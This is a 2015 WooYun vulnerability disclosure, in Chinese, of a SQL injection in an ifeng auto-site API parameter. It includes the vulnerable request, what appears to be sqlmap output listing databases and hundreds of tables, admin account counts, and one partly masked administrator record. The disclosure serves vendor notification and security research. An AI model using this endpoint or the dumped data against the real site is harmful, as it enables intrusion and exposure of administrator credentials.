凤凰网某接口MYSQL注入泄漏500管理员 | wooyun-2015-0102446| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0102446

漏洞标题：凤凰网某接口MYSQL注入泄漏500管理员

漏洞作者：路人甲

提交时间：2015-03-20 09:22

修复时间：2015-05-04 18:20

公开时间：2015-05-04 18:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-20：细节已通知厂商并且等待厂商处理中
2015-03-20：厂商已经确认，细节仅向厂商公开
2015-03-30：细节向核心白帽子及相关领域专家公开
2015-04-09：细节向普通白帽子公开
2015-04-19：细节向实习白帽子公开
2015-05-04：细节向公众公开

简要描述：

详细说明：

city有注入

GET /city/data_interface/city_cont_chips.php?city=beijing&leixing=&callback=jQuery16407793340908829123_13333321973&_=14888882213 HTTP/1.1
User-Agent: Mozilla/5.0 
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Cache-Control: no-cache
Host: api.auto.ifeng.com
Accept-Encoding: gzip, deflate

这个支持UNION 为了争取rank贴出来点数据，影响500+个ifeng内部管理用户，貌似全国各地的汽车论坛数据都在这,用户密码都mask了

available databases [3]:                                                   
[*] AUTO_CMS
[*] information_schema
[*] MCMS
Database: MCMS                                                             
[493 tables]
+--------------------------------+
| auto_active                    |
| auto_active_property           |
| auto_active_reg                |
| auto_admin                     |
| auto_admin_panel               |
| auto_akesu_news                |
| auto_akesu_news_data           |
| auto_all_news                  |
| auto_all_tuangou               |
| auto_anqing_news_data          |
| auto_anqing_tuangou            |
| auto_anqing_tuangou_data       |
| auto_anshan_news               |
| auto_anshan_news_data          |
| auto_anshan_tuangou_data       |
| auto_anshun_news               |
| auto_anshun_news_data          |
| auto_attachment                |
| auto_attachment_index          |
| auto_badword                   |
| auto_baicheng_news             |
| auto_baicheng_news_data        |
| auto_baishan_news_data         |
| auto_baoding_news              |
| auto_baoding_tuangou           |
| auto_baotou_news               |
| auto_baotou_news_data          |
| auto_baotou_tuangou            |
| auto_baotou_tuangou_data       |
| auto_beijing_news              |
| auto_beijing_tuangou           |
| auto_bengbu_news               |
| auto_bengbu_news_data          |
| auto_bengbu_tuangou            |
| auto_beta_news_data            |
| auto_beta_tuangou_data         |
| auto_bijie_news                |
| auto_bijie_news_data           |
| auto_binzhou_news              |
| auto_binzhou_news_data         |
| auto_block_history             |
| auto_block_priv                |
| auto_cache                     |
| auto_cangzhou_news             |
| auto_cangzhou_news_data        |
| auto_cangzhou_tuangou          |
| auto_cangzhou_tuangou_data     |
| auto_category_priv             |
| auto_changchun_news            |
| auto_changchun_tuangou         |
| auto_changde_news              |
| auto_changde_news_data         |
| auto_changji_news              |
| auto_changji_news_data         |
| auto_changsha_news             |
| auto_changsha_tuangou          |
| auto_changshu_news             |
| auto_changshu_news_data        |
| auto_changzhi_news             |
| auto_changzhi_news_data        |
| auto_changzhou_news            |
| auto_changzhou_news_data       |
| auto_chengdu_news              |
| auto_chengdu_tuangou           |
| auto_chengdu_tuangou_data      |
| auto_chenzhou_news             |
| auto_chenzhou_news_data        |
| auto_chifeng_news              |
| auto_chifeng_news_data         |
| auto_chifeng_tuangou_data      |
| auto_chongqing_news_data       |
| auto_chongqing_tuangou_data    |
| auto_city                      |
| auto_cjx_cache                 |
| auto_cjx_hash                  |
| auto_cjx_keyword               |
| auto_collection_content        |
| auto_collection_history        |
| auto_comment                   |
| auto_comment_check             |
| auto_comment_setting           |
| auto_content_check             |
| auto_copyfrom                  |
| auto_custom                    |
| auto_dali_news                 |
| auto_dali_tuangou              |
| auto_dali_tuangou_data         |
| auto_dalian_news               |
| auto_dalian_news_data          |
| auto_dalian_tuangou_data       |
| auto_daqing_news               |
| auto_daqing_news_data          |
| auto_daqing_tuangou            |
| auto_daqing_tuangou_data       |
| auto_dbsource                  |
| auto_dezhou_news               |
| auto_dongguan_news             |
| auto_dongguan_tuangou          |
| auto_dongguan_tuangou_data     |
| auto_download                  |
| auto_download_data             |
| auto_duyun_news                |
| auto_eerduosi_news             |
| auto_eerduosi_news_data        |
| auto_eerduosi_tuangou          |
| auto_eerduosi_tuangou_data     |
| auto_enshi_news                |
| auto_enshi_news_data           |
| auto_enshi_tuangou             |
| auto_extend_setting            |
| auto_favorite                  |
| auto_form_baoming              |
| auto_form_test_form            |
| auto_foshan_news               |
| auto_foshan_news_data          |
| auto_foshan_tuangou            |
| auto_foshan_tuangou_data       |
| auto_fu_zhou_news_data         |
| auto_fu_zhou_tuangou           |
| auto_fu_zhou_tuangou_data      |
| auto_fuqing_news               |
| auto_fuqing_news_data          |
| auto_fuyang_news               |
| auto_fuyang_news_data          |
| auto_fuyang_tuangou            |
| auto_fuyang_tuangou_data       |
| auto_fuzhou_news               |
| auto_fuzhou_news_data          |
| auto_guangzhou_news            |
| auto_guangzhou_news_data       |
| auto_guangzhou_tuangou         |
| auto_guangzhou_tuangou_data    |
| auto_guilin_news_data          |
| auto_guilin_tuangou_data       |
| auto_guiyang_news              |
| auto_guiyang_news_data         |
| auto_guiyang_tuangou           |
| auto_guiyang_tuangou_data      |
| auto_guizhou_news_data         |
| auto_haerbin_news              |
| auto_haerbin_tuangou           |
| auto_haerbin_tuangou_data      |
| auto_haikou_news               |
| auto_haikou_tuangou            |
| auto_haikou_tuangou_data       |
| auto_handan_tuangou            |
| auto_hangzhou_news             |
| auto_hangzhou_news_data        |
| auto_hangzhou_tuangou          |
| auto_hangzhou_tuangou_data     |
| auto_hanzhong_news             |
| auto_hanzhong_news_data        |
| auto_hanzhong_tuangou          |
| auto_hanzhong_tuangou_data     |
| auto_hefei_news                |
| auto_hefei_news_data           |
| auto_hefei_tuangou             |
| auto_hefei_tuangou_data        |
| auto_hits                      |
| auto_honghe_news               |
| auto_honghe_news_data          |
| auto_huaian_news               |
| auto_huaibei_news              |
| auto_huaibei_news_data         |
| auto_huaibei_tuangou           |
| auto_huaibei_tuangou_data      |
| auto_huaihua_news_data         |
| auto_huaihua_tuangou           |
| auto_huaihua_tuangou_data      |
| auto_huainan_news              |
| auto_huainan_news_data         |
| auto_huainan_tuangou           |
| auto_huhehaote_tuangou         |
| auto_huhehaote_tuangou_data    |
| auto_huizhou_news              |
| auto_huizhou_news_data         |
| auto_huizhou_tuangou_data      |
| auto_huzhou_news               |
| auto_huzhou_news_data          |
| auto_huzhou_tuangou            |
| auto_huzhou_tuangou_data       |
| auto_ipbanned                  |
| auto_jiamusi_news              |
| auto_jiamusi_news_data         |
| auto_jiangmen_news             |
| auto_jiangmen_tuangou          |
| auto_jiangyin_news             |
| auto_jiangyin_news_data        |
| auto_jiaxing_news              |
| auto_jiaxing_news_data         |
| auto_jiaxing_tuangou           |
| auto_jilin_news                |
| auto_jilin_news_data           |
| auto_jilin_tuangou             |
| auto_jilin_tuangou_data        |
| auto_jinan_news                |
| auto_jinan_tuangou             |
| auto_jinan_tuangou_data        |
| auto_jincheng_news             |
| auto_jincheng_news_data        |
| auto_jingzhou_news             |
| auto_jingzhou_news_data        |
| auto_jingzhou_tuangou          |
| auto_jingzhou_tuangou_data     |
| auto_jinhua_news_data          |
| auto_jinhua_tuangou_data       |
| auto_jinig_news                |
| auto_jinig_news_data           |
| auto_jining_news               |
| auto_jining_tuangou_data       |
| auto_jishou_news               |
| auto_jishou_news_data          |
| auto_jiujiang_news_data        |
| auto_jiujiang_tuangou          |
| auto_jixi_news                 |
| auto_jixi_news_data            |
| auto_jixi_tuangou              |
| auto_jixi_tuangou_data         |
| auto_kaili_news                |
| auto_kaili_news_data           |
| auto_kelamayi_news_data        |
| auto_keylink                   |
| auto_kunming_news_data         |
| auto_kunming_tuangou           |
| auto_kunming_tuangou_data      |
| auto_kunshan_news              |
| auto_kunshan_news_data         |
| auto_kunshan_tuangou           |
| auto_kunshan_tuangou_data      |
| auto_laiwu_news_data           |
| auto_lanzhou_news              |
| auto_lanzhou_tuangou           |
| auto_liaocheng_news            |
| auto_liaocheng_news_data       |
| auto_liaocheng_tuangou_data    |
| auto_liaoyuan_news_data        |
| auto_linyi_news                |
| auto_linyi_news_data           |
| auto_linyi_tuangou_data        |
| auto_lishui_tuangou            |
| auto_lishui_tuangou_data       |
| auto_liuan_tuangou_data        |
| auto_liupanshui_news_data      |
| auto_liuzhou_news              |
| auto_liuzhou_tuangou           |
| auto_log                       |
| auto_loudi_news                |
| auto_loudi_tuangou             |
| auto_loudi_tuangou_data        |
| auto_luoyang_news              |
| auto_luoyang_news_data         |
| auto_luoyang_tuangou           |
| auto_luoyang_tuangou_data      |
| auto_maoming_news              |
| auto_maoming_news_data         |
| auto_member                    |
| auto_member_detail             |
| auto_member_menu               |
| auto_member_verify             |
| auto_member_vip                |
| auto_menu                      |
| auto_message                   |
| auto_message_data              |
| auto_message_group             |
| auto_module                    |
| auto_mudanjiang_news           |
| auto_mudanjiang_news_data      |
| auto_mudanjiang_tuangou_data   |
| auto_nanchang_news_data        |
| auto_nanchang_tuangou          |
| auto_nanchang_tuangou_data     |
| auto_nanjing_news              |
| auto_nanjing_news_data         |
| auto_nanjing_tuangou           |
| auto_nanjing_tuangou_data      |
| auto_nanning_news_data         |
| auto_nanning_tuangou           |
| auto_nanning_tuangou_data      |
| auto_nanping_news              |
| auto_nanping_news_data         |
| auto_nantong_news              |
| auto_nantong_tuangou_data      |
| auto_news                      |
| auto_news_data                 |
| auto_ningbo_news               |
| auto_ningbo_news_data          |
| auto_ningbo_tuangou            |
| auto_ningbo_tuangou_data       |
| auto_page                      |
| auto_pay_account               |
| auto_pay_payment               |
| auto_pay_spend                 |
| auto_picture                   |
| auto_picture_data              |
| auto_pingdingshan_news         |
| auto_pingdingshan_news_data    |
| auto_plugin                    |
| auto_position                  |
| auto_position_data             |
| auto_poster                    |
| auto_poster_201208             |
| auto_poster_201210             |
| auto_poster_201211             |
| auto_poster_201212             |
| auto_poster_201302             |
| auto_poster_201304             |
| auto_poster_201306             |
| auto_poster_201307             |
| auto_poster_201310             |
| auto_poster_201311             |
| auto_poster_201312             |
| auto_poster_201401             |
| auto_poster_201402             |
| auto_poster_201403             |
| auto_poster_201405             |
| auto_poster_201406             |
| auto_poster_201407             |
| auto_poster_201409             |
| auto_poster_201410             |
| auto_poster_201411             |
| auto_poster_201412             |
| auto_poster_201503             |
| auto_poster_space              |
| auto_province                  |
| auto_putian_news               |
| auto_putian_news_data          |
| auto_puyang_news               |
| auto_puyang_news_data          |
| auto_puyang_tuangou_data       |
| auto_qingdao_news              |
| auto_qingdao_news_data         |
| auto_qingdao_tuangou           |
| auto_qinhuangdao_news          |
| auto_qinhuangdao_news_data     |
| auto_qiqihaer_news             |
| auto_qiqihaer_news_data        |
| auto_qiqihaer_tuangou_data     |
| auto_quanzhou_news_data        |
| auto_quanzhou_tuangou_data     |
| auto_queue                     |
| auto_qujing_news_data          |
| auto_qujing_tuangou            |
| auto_qujing_tuangou_data       |
| auto_quzhou_news_data          |
| auto_quzhou_tuangou            |
| auto_quzhou_tuangou_data       |
| auto_related_series            |
| auto_release_point             |
| auto_sanya_news_data           |
| auto_search_keyword            |
| auto_session                   |
| auto_shanghai_news             |
| auto_shanghai_news_data        |
| auto_shanghai_tuangou          |
| auto_shanghai_tuangou_data     |
| auto_shangqiu_news             |
| auto_shaoxing_news             |
| auto_shaoxing_news_data        |
| auto_shaoxing_tuangou          |
| auto_shaoxing_tuangou_data     |
| auto_shaoyang_news             |
| auto_shaoyang_news_data        |
| auto_shaoyang_tuangou          |
| auto_shenyang_news             |
| auto_shenyang_news_data        |
| auto_shenyang_tuangou_data     |
| auto_shenzhen_news             |
| auto_shenzhen_tuangou          |
| auto_shihezi_news              |
| auto_shihezi_news_data         |
| auto_shijiazhuang_news         |
| auto_shijiazhuang_tuangou      |
| auto_shijiazhuang_tuangou_data |
| auto_shiyan_news               |
| auto_shiyan_news_data          |
| auto_siping_news               |
| auto_site                      |
| auto_songyuan_news_data        |
| auto_special                   |
| auto_special_c_data            |
| auto_sphinx_counter            |
| auto_sso_admin                 |
| auto_sso_applications          |
| auto_sso_messagequeue          |
| auto_sso_settings              |
| auto_suihua_tuangou            |
| auto_suihua_tuangou_data       |
| auto_suizhou_news              |
| auto_suizhou_news_data         |
| auto_suizhou_tuangou           |
| auto_suqian_news               |
| auto_suqian_news_data          |
| auto_suzhou_news               |
| auto_suzhou_tuangou            |
| auto_suzhou_tuangou_data       |
| auto_taian_news                |
| auto_taian_news_data           |
| auto_taicang_news              |
| auto_taicang_news_data         |
| auto_taiyuan_news              |
| auto_taiyuan_news_data         |
| auto_taiyuan_tuangou           |
| auto_taiyuan_tuangou_data      |
| auto_taizhou_news_data         |
| auto_taizhou_tuangou_data      |
| auto_tangshan_tuangou          |
| auto_tangshan_tuangou_data     |
| auto_template_bak              |
| auto_tianjin_tuangou           |
| auto_tianjin_tuangou_data      |
| auto_tonghua_news              |
| auto_tonghua_tuangou_data      |
| auto_tongliao_news_data        |
| auto_tuan_book                 |
| auto_tuan_reserve              |
| auto_tzhou_news_data           |
| auto_tzhou_tuangou_data        |
| auto_vote_data                 |
| auto_vote_subject              |
| auto_wap_type                  |
| auto_weifang_news_data         |
| auto_weifang_tuangou_data      |
| auto_wenzhou_news_data         |
| auto_wenzhou_tuangou_data      |
| auto_wuhan_news_data           |
| auto_wuhan_tuangou             |
| auto_wuhu_news                 |
| auto_wuhu_tuangou              |
| auto_wuhu_tuangou_data         |
| auto_wulumuqi_news_data        |
| auto_wulumuqi_tuangou_data     |
| auto_wuxi_tuangou              |
| auto_wuzhou_news               |
| auto_wuzhou_news_data          |
| auto_xiamen_news_data          |
| auto_xiamen_tuangou            |
| auto_xiamen_tuangou_data       |
| auto_xian_tuangou              |
| auto_xianche                   |
| auto_xianche_data              |
| auto_xianche_order             |
| auto_xiangyang_news            |
| auto_xianyang_news_data        |
| auto_xianyang_tuangou_data     |
| auto_xingtai_tuangou           |
| auto_xingtai_tuangou_data      |
| auto_xining_news               |
| auto_xining_tuangou_data       |
| auto_xinxiang_news             |
| auto_xuancheng_news            |
| auto_xuzhou_news_data          |
| auto_yanbian_news              |
| auto_yanbian_news_data         |
| auto_yancheng_news_data        |
| auto_yangzhou_news             |
| auto_yangzhou_tuangou          |
| auto_yanji_news                |
| auto_yanji_news_data           |
| auto_yanji_tuangou_data        |
| auto_yantai_news_data          |
| auto_yichang_news_data         |
| auto_yinchuan_news             |
| auto_yinchuan_tuangou_data     |
| auto_yixing_news               |
| auto_yiyang_news_data          |
| auto_ylin_news                 |
| auto_ylin_tuangou_data         |
| auto_yueyang_news              |
| auto_yuncheng_news_data        |
| auto_yuncheng_tuangou_data     |
| auto_zaozhaung_news            |
| auto_zhangjiagang_news_data    |
| auto_zhangjiajie_news_data     |
| auto_zhanjiang_news            |
| auto_zhanjiang_news_data       |
| auto_zhengzhou_news_data       |
| auto_zhengzhou_tuangou_data    |
| auto_zhenjiang_news_data       |
| auto_zhenjiang_tuangou         |
| auto_zhongshan_news_data       |
| auto_zhoukou_news              |
| auto_zhoushan_news_data        |
| auto_zhuhai_tuangou            |
| auto_zhuhai_tuangou_data       |
| auto_zhuzhou_news_data         |
| auto_zhuzhou_tuangou           |
| auto_zhuzhou_tuangou_data      |
| auto_zibo_news_data            |
| auto_zibo_tuangou_data         |
| auto_zunyi_news                |
| auto_zunyi_news_data           |
| auto_zunyi_tuangou             |
| t1                             |
+----------
Database: AUTO_CMS                                                         
[56 tables]
+---------------------------+
| auto_admin                |
| auto_admin_panel          |
| auto_admin_role_priv      |
| auto_article_keyword      |
| auto_badword              |
| auto_blank                |
| auto_block_history        |
| auto_category             |
| auto_ceping_score         |
| auto_columnist            |
| auto_content_check        |
| auto_copyfrom             |
| auto_crontab              |
| auto_datacall             |
| auto_holidays             |
| auto_ipbanned             |
| auto_keylink              |
| auto_mobile_background    |
| auto_mobile_focus         |
| auto_model                |
| auto_model_field          |
| auto_module               |
| auto_news                 |
| auto_news_data            |
| auto_out_info             |
| auto_picture              |
| auto_position_data        |
| auto_poster               |
| auto_poster_201306        |
| auto_poster_201307        |
| auto_poster_201310        |
| auto_poster_201312        |
| auto_poster_201405        |
| auto_poster_space         |
| auto_queue                |
| auto_release_point        |
| auto_renwuziliao          |
| auto_schedule_admin       |
| auto_search               |
| auto_session              |
| auto_special              |
| auto_special_frame        |
| auto_special_frame_title  |
| auto_special_module       |
| auto_special_module_title |
| auto_special_type         |
| auto_sso_admin            |
| auto_sso_members          |
| auto_times                |
| auto_type                 |
| auto_vote_record          |
| auto_vote_result          |
| auto_workflow             |
| auto_xianche_hui          |
| auto_xinche               |
| auto_xinche1              |
+--------------------
back-end DBMS: MySQL 5.0.11
Database: AUTO_CMS
+------------+---------+
| Table      | Entries |
+------------+---------+
| auto_admin | 119     |
+------------+---------+
Database: MCMS
+------------+---------+
| Table      | Entries |
+------------+---------+
| auto_admin | 357     |
+------------+---------+
Table: auto_admin
[175 entries]
10,36,<blank>,beijing_mask@auto.ifeng.com,Z2UiJa,mask,5843b5065d3b08b2c88dab8amask,1396423096|

深夜找洞不易,求rank

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-03-20 18:19

厂商回复：

非常感谢您对凤凰网信息安全的帮助。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0102446

漏洞标题：凤凰网某接口MYSQL注入泄漏500管理员

相关厂商：凤凰网

漏洞作者：路人甲

提交时间：2015-03-20 09:22

修复时间：2015-05-04 18:20

公开时间：2015-05-04 18:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0102446

漏洞标题：凤凰网某接口MYSQL注入泄漏500管理员

相关厂商：凤凰网

漏洞作者： 路人甲

提交时间：2015-03-20 09:22

修复时间：2015-05-04 18:20

公开时间：2015-05-04 18:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0102446"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云